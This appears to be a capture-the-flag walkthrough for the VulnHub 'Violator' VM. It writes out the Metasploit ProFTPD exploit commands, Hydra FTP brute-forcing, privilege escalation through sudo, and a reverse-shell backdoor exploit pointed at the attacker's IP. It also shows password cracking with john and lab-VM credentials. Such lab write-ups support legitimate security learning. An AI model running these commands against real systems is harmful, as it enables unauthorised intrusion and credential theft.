Hack the violator (CTF Challenge)


Welcome to another boot2root / CTF this one is called Violator. The VM is set to grab a DHCP lease on boot. As, there is a theme, and you will need to snag the flag in order to complete the challenge. for  downloading open this link: https://www.vulnhub.com/entry/violator-1,153/
Some hints for you:
§  Vince Clarke can help you with the Fast Fashion.
§  The challenge isn't over with root. The flag is something special.
§  I have put a few trolls in, but only to sport with you.

Penetrating Methodologies
§  Network scaning (netdiscover, nmap)
§  Abusing HTTP web Pages
§  Dictionary generating (password)
§  Exploit ProFTPD 1.3.5rc3 (Metasploit)
§  Dictionary generating (username)
§  FTP Brute-force attack (Hydra)
§  Find faith_and_devotion file
§  Post-exploit ProFTPD-Backdoor(Metasploit)
§  Get root access
§  Download password protected rar file
§  Crack password (john)
§  Extract hidden text behind Image (ExifTool)
§  Decrypt the cipher (Engima Machine cipher)
§  Tweet author

Lets Start!!!
Let’s start with getting to know the IP of VM (Here, I have it at 192.168.1.104 but you will have to find your own)
netdiscover




nmap -A 192.168.1.104
From its scanning result, I found port 21 and 80 is opened, lets explored them.




Knowing port 80 is open in victim’s network I preferred to explore his IP in the browser. At first glance, we saw the following web page.  When couldn’t found something suspicious, so we try to check its source-code.




Hmmm!! After exploring source code page, I found the URL given for “Wikipedia” and it looks a little bit doubtful.




When I opened above mention URL, then we got a Wikipedia page for “violator (album)”. Might be the author has left this URL as hint for password dictionary?
And at the end of this page you will notice some track list written by Martin L. Gore. We copied all 9 music track tittle in text file by deleting space between phases of word and saved as dict.txt, so that we can use it later.




Since we have enumerated the ftp (ProFTPD 1.3.5rc3) was running in victim’s pc so we check its exploit in metasploit and luckily I found ProFTPD 1.3.5rc3 was exploitable. Therefore I execute following command to lunch the attack against ftp to gain command shell of victim’s machine.
use exploit/unix/ftp/proftpd_modcopy_exec
msf exploit(unix/ftp/proftpd_modcopy_exec) > set rhost 192.168.1.104
msf exploit(unix/ftp/proftpd_modcopy_exec) > set SITEPATH /var/www/html
msf exploit(unix/ftp/proftpd_modcopy_exec) > exploit

Booomm!! We got command shell of victim’s machine in our Metasploit framework and after then finished the task by grabbing flag.txt file. Further I execute following command for extracting more information for post exploitation.
I love meterpreter session, therefore, firstly I had upgraded command session into meterpreter session and then move inside /home directory to identify user’s directories.
session -u 1
session 2
cd /home
ls

As we know home directory always holds some directories for the system’s users and here found 4 directories.
Since we have dict.txt file generated above with the help of Wikipedia; lets add these 4 names (af, aw dg, mg,) in a text file and saved as user.txt.




As we have created dictionary for user-pass combination, so let’s use it for FTP brute-force attack. With help of following command we try to crack password for ftp and successfully obtained two credential for FTP login.
hydra -L user.txt -P dict.txt -u 192.168.1.104 ftp




With help of above credential we logged into FTP as af and fetched faith_and_devotion from inside the path /home/mg.
ftp 192.168.1.104
user: af
password: enjoythesilence
get faith_and_devotion




After downloading the file in our local machine, we open it through cat command and notice given Lyrics. This could be some kind of hint which author has left for us.
cat faith_and_devotion


So I use Google to get closer to Wermacht (Wehrmacht) with 3 rotaor as suggested by author to use. I found it something related to Enigma Machine cipher.

Conclusion: Might be the final flag has been encrypted by using enigma machine cipher and with help of faith_and_devotion file instruction we can decrypted that encryption.


Coming back to meterpreter shell, then we moving ahead and I found the configuration file of proftpd from inside /dg/bd/etc.
cd /home
ls
cd /dg
ls
cd bd
ls
cd /etc
ls



Then with help of cat command we opened this file and notice the FTP listening port is 2121.
cat proftpd.conf




Then with help of following command we got proper tty shell of victim’s VM machine and check sudo permission for user:dg.
shell
python -c "import pty;pty.spawn(‘/bin/bash’)"
su dg
policyoftruth
sudo -l
Here you can observe the user:dg can run proftpd as root.




Then we ran following command to check network status for all TCP port but couldn’t saw port 2121 at Listen state.
netsat -antp
Then we ran proftpd with sudo then again check network status for all TCP port and this time found port 2121 at Listen state.
sudo /home/dg/bd/sbin/proftpd
netsat -antp



Thus we have forwarded the remote service at our local network to set-up TCP relay with help of below commands:
portfwd add -L 127.0.0.1 -l 2121 -p 2121 -r 127.0.0.1
Then quickly search for metasploit exploit for ProFTPD and luckily found “ProFTPD-1.3.3c Backdoor Command Execution” as this module exploits a malicious backdoor that was added to the ProFTPD download archive.
Thus to lunch the attack type:
use exploit/unix/ftp/proftpd_133c_backdoor
msf exploit(proftpd_133c_backdoor) > set payload cmd/unix/reverse_perl
msf exploit(proftpd_133c_backdoor) > set lhost 192.168.1.107
msf exploit(proftpd_133c_backdoor) > set rhost 127.0.0.1
msf exploit(proftpd_133c_backdoor) > set rport 2121
msf exploit(proftpd_133c_backdoor) > exploit

Yuppie!! We got command shell session 3 with root privilege.




So we have root access of victim’s machine, therefore, let’s quickly get to the final flag, but as I told you that I love meterpreter session so let’s upgrade this command shell session also.
sessions -u 3
session 4
cd /root
ls

Here you will get a directory /basildon and a file flag.txt. By reading the flag.txt you will realized, it is not the original flag.txt file which author has asked to capture. Therefore we downloaded /basildon rar file in our local system.
download .basildon /root/Desktop




It was a password protected rar containing an image file and to extract this folder we required the password.




Now John cannot directly crack this key, first we will have to change it format, which can be done using a john utility called “rar2john”.
Syntax: rar2john [location of key]
rar2john crocs.rar > hash
Now let’s use John the Ripper to crack this hash with help of wordlist we have generated above.
john hash --wordlist=dict.txt

So the password for crocs.rar is “World in My Eyes”; let’s open the folder and get the image “artwork.jpg”.




So we got below image of violator and I was pretty sure that it must be holding hidden message for the flag.




Thus we used exiftool for extracting metadata from inside it. And after running following command we found the cipher text. Let me remind you that, in above enumerated “faith_and_devotion file we got some hint for Enigma Machine Cipher. 
exiftool artwork.jpg




Copy the cipher text and then open this link for decrypting enigma and past the cipher. Then use faith_and_devotion text as instructions. 

* Use Wermacht with 3 rotors
* Reflector to B
Initial: A B C
Alphabet Ring: C B A
Plug Board A-B, C-D

Hurray!!! We got the plaintext message. The message was “ONE FINAL CHALLENGE FOR YOU BGHX” and to get this final flag you can tweet the author.



0 comments:

Post a Comment